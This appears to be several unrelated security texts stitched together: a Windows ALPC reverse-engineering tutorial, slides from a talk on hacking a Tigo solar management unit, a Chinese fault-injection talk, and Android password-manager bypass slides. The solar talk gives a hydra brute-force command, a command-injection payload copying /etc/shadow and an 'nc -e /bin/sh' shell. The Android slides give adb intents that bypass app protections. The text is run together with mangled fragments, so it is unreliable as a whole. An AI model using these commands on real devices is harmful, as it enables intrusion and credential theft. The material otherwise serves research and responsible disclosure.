firing up our WinDbg kernel debugger and start to get some information about it by resolving function calls that contain the name “ALPC” - this might not be the smartest starting point, but that doesn’t matter, we start somewhere and make our way… The WinDbg command we need for this is: kd:> x *!*Alpc* This command will resolve function names of the following pattern [ModuleName]! [FunctionName] , where we can use wildcards (‘*’) for both the module and function names. In this case that means we’re resolving all functions that contain the word “Alpc” in their names within all loaded modules. In case it’s your first time with WinDbg (or you’re like me and tend to forget what certain commands mean), you can always use WinDbg’s help menu to lookup a command via: kd:> .hh [Command] , as shown below: WinDbg's help menu WinDbg .sympath command WinDbg's 'Break' command Example of function naming convenction in Windows Side note: Although the command you’ve entered is pre-selected you actually have to click the ‘Display’ button. Another option is to lookup the Debugger commands online here. If you get an error saying that that something could not be resolved, you likely do not have your symbol path set up. Ensure you have your symbols either stored locally or pulling from https://ms dl.microsoft.com/download/symbols (or both). You can check your sympath with: .sympath If you have your symbol path setup correctly, you’ll receive a good amount of results showing all sorts of functions that contain the name “ALPC”. If things take too long (because you made a typo, or things can’t be resolved or any other problem occurs) you can always hit + or open the Debug menu and click Break to stop the current action: From here you should copy all the resolved functions into an editor of your choice (I use VisualStudio Code) and sort these by name to get a feeling for which Alpc functions exists in which modules and may belong to which components. The strong naming convention applied to the Windows codebase will help you a lot here, so let’s have a look at this: To make this more readable: Sorted ALPC functions Looking only at this very first resolved function call we can make the assumption that this function is a private function within the ThreadPool component within ntdll.dll, which likely does some allocation of some memory for something. Applying this knowledge to all listed functions, we can sort and organize the resolved functions to create a rough picture of where (in the codebase) these are implemented: The value of this step is not being a 100 percent accurate or getting a label assigned to each function, but instead create a rough mapping of which parts of the OS are concerned with ALPC and which of these modules and function names sound familiar and which don’t. From here on we can drill down into modules that sound familiar (or interesting) to us. For example we have spotted the ntdll module, which we know is the userland border gateway for calling native system (kernel) services (functions). So we can assume that Windows allows userland processes to call certain ALPC functions, which comes down the the assumption of “ALPC is usable from userland applications”. Looking only at “*Alpc*” functions inside the ntdll module we can find that there are 4 types of functions: No-component functions, e.g.: ntdll!AlpcRegisterCompletionList Nt-component functions, e.g.: ntdll!NtAlpcCreateResourceReserve Zw-component functions, e.g.: ntdll!ZwAlpcCreateResourceReserve Tp-Component functiosn, e.g.: ntdll!TppAllocAlpcCompletion As the Nt and Zw functions are meant to call the same kernel functions (see here, here and here for why they exist), we can safely ignore one them, so we’ll cut off the Zw functions. I myself am not too familiar with the thread pool manager, so I’ll drop the Tp functions as well, which leaves us with a much smaller set of potentially interesting functions: 00007ff9`49498c54       >> The function address ntdll                   >> The module name ("ntddl" in this case) !                       >> The seperator Tp                     >> Abbreviation of the component ("Thread Pool" in this case) p                       >> Abbreviation of the function type ("private") AllocAlpcCompletion     >> Descriptive name of the functions Sample selection of ALPC function Selected function: NTAlpcCreatePort Once again the goal here is not to select a specific set of functions, but instead just making a selection based on something. It’s always a good idea to select things you know or that sound familiar and cycle down a learning path from there… The upper list of the no-component ALPC functions does have a lot of function names containing the words “CompletionList”, which might or might not sound familiar to you. The bottom list of Nt ALPC functions on the other hand appears quite heterogeny and based on the Nt component naming convention I would assume that these functions are meant to be gateway functions from user-land to kernel-land. We’ve drilled down this far so let’s take one these functions and start the reversing job. There is no right and wrong in picking one, you can be lucky and pick a function that is meant to be used during the early stage of an ALPC setup, which has further hints on how to use ALPC, or one might unknowingly pick a function that is only meant for special ALPC scenarios… the joy of undocumented stuff… At this point we can’t know which function is a good starting point, so let’s choose one that at least sounds like its meant to be used at the start of a process, like something with Create in its name: I obviously already know that this function is going to be useful, so forgive me the “let’s pick something randomly”-dance. NtAlpcCreatePort in Ghidra NtAlpcCreatePort in Ghidra with assembly code From User to Kernel Land Let’s fire up Ghidra and have a look at the NtAlpcCreatePort function within ntdll.dll : Ok… this is not increadibly helpful… and also looks odd. A syscall is made with no arguments and the function then returns the integer 0x79… Double checking this decompiled code with the actual instructions displayed right next to the decompiled window, does show a different picture: The actual code instructions show that the integer value 0x79 is moved into EAX and then the syscall is made. Quickly double checking this with IDA Free to be sure: NtAlpcCreatePort in IDA Free Yep, okay that makes more sense. First take away here is: Ghidra is a really great tool, the decompilation feature can be flaky (even for simple functions), but on the other hand: Automated decompilation is a massive feature that is handed out for free here, so no hard feelings about some errors and manual double checking effort. We figured the NtAlpcCreatePort function within ntdll.dll is pretty much calling into kernel mode right away using the syscall number 0x79 (121 in decimal). From here we got three options to continue: Head to the kernel straight away and look for a function with a similar name and hope that we get the right one (ntdll and kernel function names are often very similar) - This is the least reliable method. Lookup the syscall number (0x79) online to find the corresponding kernel function. Manually step through the process of getting and resolving the syscall number on your host system - This is the most reliable method. Let’s skip lazy option 1 (least reliable) and check out options two and three. Lookup Syscall number online One of the best (and most known) resources to lookup syscall numbers is https://j00ru.vexillium.o rg/syscalls/nt/64/ (x86 syscalls can be found here). Syscall reference from https://j00ru.vexillium.org/syscalls/nt/64/ For my Windows 10 20H2 system this great online resource directly points me to a kernel function named “NtAlpcCreatePort”. Stepping through the syscall manually I’ve learned and applied the process from www.ired.team, all credits and kudos go to ired.team ! We can use WinDbg to manually extract the corresponding kernel function from our debugged host systems. There are 6 steps involved here: 1. Setting a breakpoint in ntdll at ntdll!NtAlpcCreatePort to jump into the function. This can be done through the following WinDbg command: kd:> bp ntdll!NtAlpcCreatePort List breakpoints in WinDbg 2. Verify our breakpoint is set correctly, via: kd:> bl 3. Let the debuggee run until this breakpoint in ntdll is hit: kd:> g Disassembled syscall in WinDbg 4. Ensure we are at the correct location and have the syscall right ahead: kd:> u . (unassemble the next following instructions) 5. Lookup the offset in the SSDT (System Service Descriptor Table) for the syscall number, 0x79: kd:> dd /c1 kiservicetable+4*0x79 L1 6. Checking the address of the syscall function using the SSDT offset: kd:> u kiservicetable + (02b62100>>>4) L1 All these steps can be found in the screenshot below: Dispatching a syscall in WinDbg NtAlpcCreatePort in IDA Free Using either of these three methods we would have come to the result that ntdll!NtAlpcCreatePort calls into the kernel at nt!NtAlpcCreatePort Hunting An ALPC Object Now we’ve figured that we end up calling the kernel in nt!NtAlpcCreatePort , so let’s have a look at this. We can fire up IDA Free (Ghidra would’ve been just as fine), open up ntoskrnl.exe from our system directory, e.g. C:\Windows\System32\ntoskrnl.exe, load Microsoft’s public symbols, and we should be able to find the function call NtAlpcCreatePort . From there on we can browse through the functions that are called to get a first idea of what’s going on under the hood for this call. Following the first few function calls will route us to a call to ObCreateObjectEx , which is an ObjectManager (Ob) function call to create a kernel object. That sounds like our ALPC object is created here and IDA also tells us what type of object that is, two lines above the marked call in the window on the right, a AlpcPortObjectType . At this point I’d like to try to get a hold of such an object to get a better understanding and insight of what this actually is. As the function ObCreateObjectEx will create the object the plan here is to switch back to WinDbg and set a breakpoint right after this call to find and inspect the created object. NtAlpcpCreatePort breakpoint in WinDbg ALPC port object in WinDbg After placing this breakpoint we hit g to let WinDbg run and once it hits we check if we can find the created object being referenced somewhere. The reliable method for this is to follow the object creation process in ObCreateObjectEx and track where the object is stored once the function finishes (the less reliable option is to check the common registers and the stack after the function finishes). In this case we can find the created ALPC object in the RCX register once we hit our breakpoint. Sweet we found a newly created ALPC port object. At this point the !object command can tell us the type of the object, the location of its header and its name, but it can’t add additional detail for this object, because it does not now its internal structure. We do not know either, but we could check if there is a matching public structure inside the kernel that we can resolve. We’ll try that with kd:> dt nt!*Alpc*Port … Resolved _ALPC_PORT structure in WinDbg Applied _ALPC_PORT structure in WinDbg We once again used wildcards combined with the information we obtained so far, which are: We’re looking for a structure inside the kernel module (nt) and we’re looking for a structure that matches an object that we knew is of type AlpcPortObjectType. The naming convention in Windows often names structures with a leading underscore and all capital letters. The first hit ntkrnlmp!_ALPC_PORT looks like a promising match, so let’s stuff our captured ALPC port object in this structure: That does indeed look like a match, however some attributes, that one would expect to be set, are empty, for example the “OwnerProcess” attribute. Before we throw our match in the bin, let’s remember we’re still in the breakpoint right after ObCreateObjectEx , so the object has just been created. Walking back through functions we’ve traversed in IDA, we can find that there are a couple more functions to be called within the AlpcpCreateConnectionPort function, such as AlpcpInitializePort , AlpcpValidateAndSetPortAttributes and others. Sounds like there is more to come that we want to catch. Right now, we’re in some process that created an ALPC port (so far we didn’t even bother to check which process that is) and we want to jump to a code location after all the initialization functions are completed and check what our ALPC port structure looks like then, so here’s a rundown of what we want we want to do: 1. We want to note down the address of our ALPC object for later reference. 2. We want to find the end of the AlpcpCreateConnectionPort function. 3. We want to jump to this location within the same process that we currently are in, 4. We want to load our noted ALPC object into the ntkrnlmp!_ALPC_PORT structure to see what it looks like. And here’s how to do that… Noting down the ALPC Port object reference 1. Noting down the ALPC object address… Done: ffffac0e27ab96e0 Finding the end of the AlpcpCreateConnectionPort function 2. Finding the end of AlpcpCreateConnectionPort … Done jumping to 0xfffff803733823c9 3. Jump to this address within the same process can be done using this command kd:> bp /p @$proc fffff803733823c9 Note: I’m also checking in which process I am before and after the call just to be on the safe side Jumping to the located address Re-applied _ALPC_PORT structure in WinDbg 4. Check ALPC Objet structure again… That looks more complete and we could walk through an all setup ALPC object from here as easy as using the links provided by WinDbg to inspect what other structures and references are linked to this object. Just for the sake of providing an example and to double confirm that this ALPC Port object is indeed owned by the svchost.exe process that we identified above, we can inspect the _EPROCESS structure that is shown at ntkrnlmp!_ALPC_PORT + 0x18 : _EPROCESS structure of the owning process in WinDbg _SECURITY_QUALITY_OF_SERVICE structure of the identified ALPC port object in WinDbg We find the ImageFileName of the owning process of the ALPC object that we’ve caught to be “svchost.exe”, which matches with the process we’re currently in. At this point we’ve found an all setup ALPC port object that we could further dissect in WinDbg to explore other attributes of this kernel object. I’m not going any deeper here at this point, but if you got hooked on digging deeper feel free to continue the exploration tour. If you’re following this path, you might want to explore the ALPC port attributes assigned to the port object you found, which are tracked in the nt!_ALPC_PORT_ATTRIBUTES structure at nt!_ALPC_PORT + 0x100 to check the Quality of Service (QOS) attribute assigned to this object ( nt!_ALPC_PORT + 0x100 + 0x04 ). If you found an ALPC port object with an (QOS) impersonation level above SecurityIdentification, you might have found an interesting target for an impersonation attack, detailed in my previous post Offensive Windows IPC Internals 3: ALPC. In this case, it’s only SecurityAnonymous, well… By now you should be all set up to explore and dig into ALPC. The first steps are obviously going to be slow and you (and I) will take a few wrong turns, but that is part of everyone’s learning experience. If I could add a last note to aid in getting on a joyful ride it’s this: I personally enjoy reading good old, paperback books, to learn, dig deeper and to improve my skillset with Windows internals. If you are of similar kind, you might as well enjoy these book references (if you not already have them on your desk): Windows Internals Part 1 Windows Internals Part 2 Inside Windows Debugging Windows Kernel Programming There already is a published 1st edition of this, but if you want the latest and greates you might want to wait for @zodiacon’s new release. … Enjoy your ride ;) …
All Your Solar Panels are belong to Me FRED BRET-MOUNET Who am I? • Disclaimer: • This presentation is based on information I gathered through my research. It is full of omissions and inaccuracies due to my own lack of knowlege and incompetency. • This research has performed on my (extensive) spare time. My employer has nothing to do with this content. • WarGames (1983) – the first movie about a hacker? “A hacker is one who enjoys the intellectual challenge of creatively overcoming limitations of software systems to achieve novel and clever outcomes.” Gehring, Verna (2004). The Internet In Public Life. This is the topic of today! Tigo Energy ® Maximizer™ Management Unit • (Remotely) Manages individual Solar Panels through Bluetooth. • In emergency conditions, can (remotely) disable the array by shutting down individual solar panels. • Reports performance back to the Cloud. Tigo Energy ® Maximizer™ Management Unit • (Remotely) Manages individual Solar Panels through Bluetooth. • In emergency conditions, can (remotely) disable the array by shutting down individual solar panels. • Reports performance back to the Cloud. • Can be used for performance SLAs… Tigo Energy ® Maximizer™ Management Unit • (Remotely) Manages individual Solar Panels through Bluetooth. • In emergency conditions, can (remotely) disable the array by shutting down individual solar panels. • Reports performance back to the Cloud. • Can be used for performance SLAs… Where it started… Attack Surfaces - Logical • Open Access Point • httpd • Dns • Ssh • Serial to tcp • Dhcp • Unknown UDP 5002 Attack Surfaces - Physical • uBoot • Console • Rs-489 • USB host • Emergency Button Open Access Point • Thanks https://wigle.net/ ! • Located 160+ out of ~1000 with 24/7 open AP. • 10000+ with limited window of opportunity for open AP. Open Access Point httpd •All’s lost! httpd •Not really! •Hydra to the rescue: •hydra -l admin –P rockyou.txt -v httpd •Not really! •36 hours later: Admin/Support httpd • One page caught my attention! • And another one (that I had to play with a little):; cp%20%2Fetc%2Fshadow%20%20%2Fmnt%2Fffs%2Fvar%2Flmu dcd.foreign_lmus httpd • One page caught my attention! • And another one (that I had to play with a little):; cp /etc/shadow /mnt/ffs/var/lmudcd.foreign_lmus httpd • Kick off John The Ripper & HashCat… but I gave up! • Why spend energy bruteforcing when I have a shell?! httpd • NetCat to the rescue ( provided courtesy of the vendor J);nc -e /bin/sh 9999 • Ps –all: • 17406 root 0:00 httpd -h /mnt/ffs/www -c /mnt/ffs/etc/httpd.conf -r TigoEnergy Management Unit • Now just add yourself after some mount kung fu… httpd Hint: Audience applauds now! What’s next? • Look around! • Something caught my attention in the running processes: 3260 root 0:02 openvpn--config supporttcp.conf–syslog • Yes, the device on my network has a permanent VPN tunnel back to the Vendor. • Not mentioned in any Terms of Use or documentation… Vendor response Vendor response •A dozen emails asking for patience later… Vendor response •OMG… I can see my future... Vendor response • Then this: Vendor response • Recognize the attached picture? • That worked! • 2 months SLA not atypical… Vendor response •Remember the VPN tunnel? •Within the hour, •Open AP shut down •User removed •httpd shut down •But… I was not done helping L Vendor response •I have a developer build part of about ~1000 that were accidentally shipped. • No Way! I bought an off the shelf solution trusting I was getting what I paid for. •How does this change everything? • Not much. • No VPN backdoor. To be confirmed. • Open AP window of opportunity dramatically narrowed. What the Vendor did well! •Once I had the communication channels open, they welcomed my research. •uBoot custom build with password protection. •Apparently unique OpenVPN key. •Log shipping. •Shipping a replacement device to all affected customer. Why is all this important? • No need to blow up a power plant. I could have shut down a large amount of solar generation. • Remote control of a network device on your home network. • Spying • Botnet • Anonymizer • … • In today’s world of IoT, security is every manufacturer’s problem. Takeaway •My biggest lessons: • The dozen or so IoT devices I use are now on a segmented & firewalled network. • Do not reach out to the vendor too soon! •Responsible disclosure is hard… but it’s the only way to go. Credits • First & foremost my wonderful Wife … Merci Mon Amour pour ton soutien inconditionnel. • My son, Raphael for showing interest in my Craft. • Maxym @ Tigo for his support! • Tigo, for not suing me. • Defcon team for their invaluable support. • Paul, friends and colleagues for their review and guidance.
设备 皆有 故障! 全⾯面沦陷:噪声攻击与IOT设备的 10+年年战争 ⽬目录 概述 FI 的发展和现状 FI的实际应⽤用 FI的预防 问题在哪? const char *PIN = "19379148" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(pin); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf("Please, introduce PIN\r\n"); gets(pin); result = comparePIN(pin); if (result == false) { sprintf(tmp,"PIN correct\r\n"); } else { sprintf(tmp,"PIN %s is incorrect\r\n",pin); } printf(tmp); return result; } 问题在哪? const char *PIN = "19379148" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(pin); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf("Please, introduce PIN\r\n"); gets(pin); result = comparePIN(pin); if (result == false) { sprintf(tmp,"PIN correct\r\n"); } else { sprintf(tmp,"PIN %s is incorrect\r\n",pin); } printf(tmp); return result; } 问题在哪? const char *PIN = "19379148" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(PIN); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf("Please, introduce PIN\r\n"); fgets(pin,sizeof(pin),stdin); result = comparePIN(pin); if (result == false) { sprintf(tmp,"PIN correct\r\n"); } else { sprintf(tmp,"PIN %s is incorrect\r\n",pin); } printf("%s",tmp); return result; } 它现在是否 安全? 问题在哪? const char *PIN = "19379148" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(PIN); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf("Please, introduce PIN\r\n"); fgets(pin,sizeof(pin),stdin); result = comparePIN(pin); if (result == false) { sprintf(tmp,"PIN correct\r\n"); } else { sprintf(tmp,"PIN %s is incorrect\r\n",pin); } printf("%s",tmp); return result; } 它现在是否 安全? 我是谁? 示例 故障注入攻击 电压故障 5.5V 100 ms 1.8V 5.5V 100 ms 1.8V 电压故障 5.5V 100 ms 1.8V 5.5V 100 ms 1.8V 故障! 故障! FI如何工作? +5V CPU GND SRAM CU ALU CACHE … … FI如何工作? CU ALU CACHE FI如何工作? CU ALU CACHE FI如何工作? CU ALU CACHE FI如何工作? CU ALU CACHE FI如何工作? CU ALU CACHE 故障! 设备失灵 位翻转 CMP R0,R1 BNE ERROR ... 跳过/破坏指令 故障的影响 阻碍读/写 1 1 0 0 位翻转 0 0 0 1 0 1 1 → 0 1 0 1 0 0 0 1 1 位翻转 0 0 0 → 1 跳过/破坏指令 const char *PIN = "19379148" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(PIN); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf("Please, introduce PIN\r\n"); fgets(pin,sizeof(pin),stdin); result = comparePIN(pin); if (result == false) { sprintf(tmp,"PIN correct\r\n"); } else { sprintf(tmp,"PIN %s is incorrect\r\n",pin); } printf("%s",tmp); return result; } 跳过/破坏指令 result = comparePIN(pin); ldr r0, [sp, #pin] bl comparePIN str r0, [sp, #result] 1 1 1 1 0 0 0 0 0 0 0 1 1 0 1 0 地址 操作码 result = comparePIN(pin); result = pin; ldr r0, [sp, #pin] bl comparePIN str r0, [sp, #result] ldr r0, [sp, #pin] strb r2, [r3, #0] str r0, [sp, #result] 1 0 跳过/破坏指令 1 1 1 0 0 0 0 0 0 0 1 1 0 1 0 地址 操作码 跳过/破坏指令 result = comparePIN(pin); ldr r0, [sp, #pin] bl comparePIN str r0, [sp, #result] 1 0 0 1 0 0 0 0 0 0 0 1 0 0 0 1 地址 操作码 result = comparePIN(pin); comparePIN(pin); ldr r0, [sp, #pin] bl comparePIN str r0, [sp, #result] ldr r0, [sp, #pin] bl comparePIN asrs r1, r2, #32 1 0 跳过/破坏指令 0 0 1 0 0 0 0 0 0 0 1 0 0 0 1 地址 操作码 模块失灵 位翻转 CMP R0,R1 BNE ERROR ... 跳过/破坏指令 故障的影响 破坏芯片 阻碍读/写 FI的发展和现状 FI 正在成为流行的测试技术! 但它已经存在很多年了... 年龄测试! 这两者之间有什么关系? 不要在家做这个! FI的实际应用 故障注入规则 #1 故障注入规则 #2 10+ 年存在的故障 绕过身份认证 绕过安全启动 升级权限 复原加密密钥 修改安全配置. 绕过身份认证 绕过身份认证 const char *PIN = "19379148" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strlen(pin); i++) { if (pin[i]!=PIN[i]) return true; } return false; } // Authenticate PIN. // Return true if incorrect bool pinAuthentication() { char pin[80]; char tmp[80]; bool result=false; printf("Please, introduce PIN\r\n"); gets(pin); result = comparePIN(pin); if (result == false) { sprintf(tmp,"PIN correct\r\n"); } else { sprintf(tmp,"PIN %s is incorrect\r\n",pin); } printf(tmp); return result; } 绕过身份认证 统一诊断服务 统一 诊断 服务 UDS(通用数据系统) 身份认证 FI if (receivedKey != expectedKey) not_authenticated(); // Glitch else authenticated(); if (receivedKey != expectedKey) not_authenticated(); else authenticated(); 使用FI绕过UDS认证 绕过安全启动 安全启动 内部 引导芯片 第二阶段 引导程序 近阶段 引导程序 OS 加载器 应用程序 加载器 验证签名&解密 验证签名&解密" 验证签名&解密" 验证签名&解密" 绕过安全启动 绕过安全启动 //Verify image. Returns true is correct bool verifyImage(uint8_t *image, uint32_t len, uint8_t *sign, rsaKey) { char *hash1, *hash2; ... // Calculate Hash calculateHash(image,len,hash1) // Verify signature verifySignature(sign, rsaKey, hash2) // Compare hashes if (memcmp(hash1, hash2, HASH_LEN) != 0) return false; else return true; } void boot() { void (*entryPoint)(void); ... // Load image to buffer uint32_t len = loadFlashImage(imgBuf) // Verify image if (verifyImage(imgBuf, len, sign, rsaKey) == false) { goto reset; // Auth failed } // Jump to image entryPoint = imgbuf; (*entryPoint)(); ... } 你是否记得FI规则#2? 保护安全启动可能是一个噩梦 FISim(金融中介服务)案例 升级权限 升级权限 User space Kernel space REE TEE REE-TEE 分离 REE CPU TEE CPU REE memory Shared memory (mailbox) TEE memory 随机跳跃攻击 REE CPU TEE CPU Mailbox" 载荷 载荷地址 载荷地址 载荷地址 载荷地址 … 写入消息" 读取消息" 随机跳跃攻击 REE CPU 写入消息" TEE CPU Mailbox" 载荷 载荷地址 载荷地址 载荷地址 载荷地址 … 读取消息" 随机跳跃攻击 TEE CPU Mailbox" 载荷 载荷地址 载荷地址 载荷地址 载荷地址 … 读取消息" memcpy(dst,src,len); ... loop: ldr r0, [r3], #4 str r0, [r4], #4 ... 1 1 1 0 0 1 0 0 1 0 1 1 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 1 1 0 0 1 0 0 1 0 1 1 0 0 1 1 1 1 1 1 0 0 0 0 0 0 0 0 0 1 0 0 随机跳跃攻击 TEE CPU Mailbox" 载荷 载荷地址 载荷地址 载荷地址 载荷地址 … Read"message" memcpy(dst,src,len); ... loop: ldr r0, [r3], #4 str r0, [r4], #4 ... 1 1 1 0 0 1 0 0 1 0 1 1 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 ... loop: ldr pc, [r3], #4 str r0, [r4], #4 ... Payload(); 升级权限 复原密钥 复原密钥 故障分析 DFA$ 差分故障分析$ CFA$ 碰撞故障分析$ SFA$ 统计故障分析$ DFIA$ 差分故障$ 强度分析$ $ IFA$ 失效的故障分析$ SIFA$ 统计失效故障分析$$ $ b0,0 b0,1 b0,2 b0,3 b1,0 b1,1 b1,2 b1,3 b2,0 b2,1 b2,2 b2,3 b3,0 b3,1 b3,2 b3,3 b0,0 b0,1 b0,2 b0,3 b1,0 b1,1 b1,2 b1,3 b2,0 b2,1 c2,2 b2,3 b3,0 b3,1 b3,2 b3,3 AES故障分析 基于关键属性的故障注入 Key Attributes Key 1 AES ENC Key 2 3DES DEC Key 3 AES/3DES ENC/DEC … … … Crypto engine 3DES DES AES Key Attributes Key 1 AES ENC Key 2 3DES DEC Key 3 AES/3DES ENC/DEC … … … Keyslot" Key Attributes Key 1 AES ENC Key 2 3DES DEC Key 3 AES/3DES ENC/DEC … … … 基于关键属性的FI Key Attributes Key 1 DES ENC Key 2 3DES DEC Key 3 AES/3DES ENC/DEC … … … Crypto engine 3DES DES AES Keyslot" 复原密钥 修改安全配置 阻碍安全配置 // Read fuses and configure security modules bool disableJtag = readFuse(DISABLE_JTAG); bool enableMemoryScrambler = readFuse(ENABLE_MEM_SCRAMBLER); bool enableTEE = readFuse(ENABLE_TEE); if (disableJtag==true) closeJtag(); if (enableMemoryScrambler==true) configureMemoryScrambler(); if (enableTEE==true) configureTEE(); void boot() { void (*entryPoint)(void); ... // Load image to buffer uint32_t len = loadFlashImage(imgBuf) // Verify image if (verifyImage(imgBuf, len, sign, rsaKey) == false) { goto reset; // Auth failed } // Jump to image entryPoint = imgbuf; (*entryPoint)(); ... } 局部故障注入 电磁故障注入" 激光故障注入" 激光故障注入 电磁故障注入 FI的预防 FI的应对措施 VS 硬件" 软件" 故障注入规则 #3 基于硬件的措施 1.8V 故障感应器" 冗余" if (receivedKey != expectedKey) not_authenticated(); // Glitch else authenticated(); 基于软件的措施#1 if (receivedKey != expectedKey) not_authenticated(); else authenticated(); if (receivedKey != expectedKey) not_authenticated(); // Glitched ... // Do something else ... if (receivedKey != expectedKey) not_authenticated(); else authenticated(); if (receivedKey != expectedKey) not_authenticated(); ... // Do something else ... if (receivedKey != expectedKey) not_authenticated(); else authenticated(); 基于软件的措施 #1 sleep(rand()); // Random delay if (receivedKey != expectedKey) not_authenticated(); else authenticated(); 基于软件的措施 #2 总结 记住这些规则! 更多信息: Protecting software against FI https://www.riscure.com/uploads/2018/11/201708_Riscure_Whitepaper_Side_Channel_Patterns.pdf FI on UDS: https://www.riscure.com/uploads/2018/06/ Riscure_Whitepaper_Fault_injection_on_automotive_diagnostic_protocols.pdf Bypassing secure boot https://www.riscure.com/uploads/2017/10/eu-16-Timmers-Bypassing-Secure-Boot-Using-Fault- Injection.pdf Linux privileges escalation: https://www.riscure.com/uploads/2017/10/ Riscure_Whitepaper_Escalating_Privileges_in_Linux_using_Fault_Injection.pdf Optical FI https://www.riscure.com/uploads/2017/09/Practical-optical-fault-injection-on-secure- microcontrollers.pdf Wild Jungle Jump attack https://www.riscure.com/uploads/2017/09/Controlling-PC-on-ARM-using-Fault-Injection.pdf Practical DFA https://www.slideshare.net/secret/K8jlDL4os1evrW 招聘进行中! 上海海·中国 代尔夫特·荷兰 旧⾦金金⼭山·美国 Riscure North America 550 Kearny St. Suite 330 San Francisco, CA 94108 +1 (650) 646 9979 inforequest@riscure.com Riscure B.V. Frontier Building, Delftechpark 49 2628 XJ Delft The Netherlands Phone: +31 15 251 40 90 www.riscure.com Contact: Riscure China 2081, No.989, Changle Road 200031 Shanghai China Phone: +86 21 5117 5440 Wechat: RiscureChina Ramiro Pareja pareja@riscure.com
Bypassing)Android) Password)Manager)Apps) Without)Root Stephan)Huber,)Siegfried)Rasthofer,)Steven)Arzt Fraunhofer SIT 2 Stephan • Mobile)Security)Researcher)at) Fraunhofer)SIT • Enjoys teaching)students)in) Android)(app))hacking • Twitter:)@teamsik Siegfried • Head)of Secure)Software) Engineering)at)Fraunhofer)SIT • Founder of CodeInspect • Web:)www.rasthofer.info • Twitter:)@teamsik Acknowledgements • Benedikt)Hiemenz • Daniel)Hitzel • Daniel)Magin • Joseph)Varghese • Julien)Hachenberger • Max)Kolhagen • Michael)Tröger • Philipp)Roskosch • Wittmann)Andreas 3 4 Wish 5 aim=e1Ioci Ohyoh>wae0 kei7Gae$si bei3coo<Li ooB,iu9AhN Phei0IeHa' uhu;j5ohTi Phi,Phu3di Moo0ooz"oh we(u,t0Zas quucoo<d2I Pae?gh<ie3 loh;Bah4ei Wa[el~oh9i ooh!ee7Aik AX1aeSh>ai eGah+K5iuM yae$V4leex ohjiu_Hei6 fee'Cho5Oo jahK3Ad+ai oH)eewaec0 KiG&ee4ahy ujohj%ie1J wae,Gei6mu uSh=i2ahng ainai]Le2i Ieb~o5fohF ohN\ah1gae Dooch\ei7i ich]a're1U aiToh5cee= eiZ2thaip; ni"W3oom?i oi(Sh7vie) gu}i8Tohco il@ah@ve9U cie"tae8Eo Au&S3aigae eir0ieHo)c ohch/ah6Ii Bie*t9xie" ukieTh6fu[ ie*vieZai9 ohwu(v0eeY ua&ghi7aeR em?ohG?oi3 phu$L^ah4p ieX&i2shei aiZie%l7Oo ood8Pe<emo faiGh[ie0i OPho9sie>n phie9Ib(ie beiMei[r7a Nagh(aid0U AhTee:tah5 oY"a5pheib ohthe1Na.e eria9Ahn>u eid8Ohso!o Uv4ia6Gu`o Aeli1li$i& Toth^ai8ph Euso6eu$ja vie8Ieh?ai leec4aeZ/o Eele+ph2na yai=b!a5Oo Wefoh&m4oh Vo-oX9ka0v ei9eenuN<a Eit}ae4ohF heRie.J6Bo OoZ-ue9mai zait8coo]N yoh9Oopoh$ xoh%C:ahk6 Zi]opu4eiB eGh>ih2oPh noo7Ish'ie Uaz6she|Zu oo0aiP*ee2 coh=Puo1Ve roo9Kee-th ra@c3Ce7sh mabi6Malo[ auw1Eu\kie eiVoo,Kuu5 aiW\oo5phu Oos_abir7U Reality 6 Note Password-Manager Password-Recycling Browser) Password-Manager 7 App GooglePlay Downloads Keeper 10)– 50 m Keepsafe 10)– 50)m 1Password 1 – 5)m Dashlane 1)– 5)m Lastpass 1)– 5)m Avast 0.5)– 1)m MyPasswords 0.5)– 1)m F-Secure 100)– 500 k PasswordManger 50 – 100)k Security)Requirements 8 Confidentiality Availability Integrity 9 • Premium)features)for)free • Resetting)master)password)with)ease • Breaking)C.I.A • Lost)device)scenario • Mitm attacks • Via)third)party)app 10 Internet App Account)Manager (master password) File (master password) PW-Manager)App user1:pw1 user2:pw2 ... Database PC “No-root scenario“ 11 Premium8upgrade8for free ! Get Pro)for Free 12 public abstract class BasePreferenceActivity extends AppCompatPreferenceActivity { protected static boolean a = false; protected void onCreate(Bundle bundle) { boolean z = false; super.onCreate(bundle); … if (getIntent().getIntExtra("com.xy.mo.apps.pwmgr.EXTRA_SUFCXNUQVRF", 0) == 2) { z = true; } a = z; } Premium)Flag adb shell am start -n com.xy.mo.apps.pwmgr/.settings.DatabaseSettings --ei com.xy.mo.apps.pwmgr.EXTRA_SUFCXNUQVRF 2 check)Intent value Before and After)Intent Before Intent: After)Intent: 13 14 Logic Flaw Logic Design)Flaw 15 Forgot Password Verification Code YES Correct ? Security)Question YES Reset Master)Password Correct ? YES USER Attacker has (physical)8device Access. read emails on)device ? Logic Design)Flaw • Manifest: • Start)Activity: 16 <activity android:theme="@*android:style/Theme.NoDisplay" android:label="@afk/app_name" android:name="com.xyz.android_apps.noname.DeepLinkActivity"> <intent-filter> <action android:name="android.intent.action.VIEW" /> <category android:name="android.intent.category.DEFAULT" /> <category android:name="android.intent.category.BROWSABLE" /> <data android:scheme="https" android:host="xyz.com" android:pathPattern="/.*st.*" /> </intent-filter> </activity> adb shell am start -n com.xyz.android_apps.noname/.DeepLinkActivity 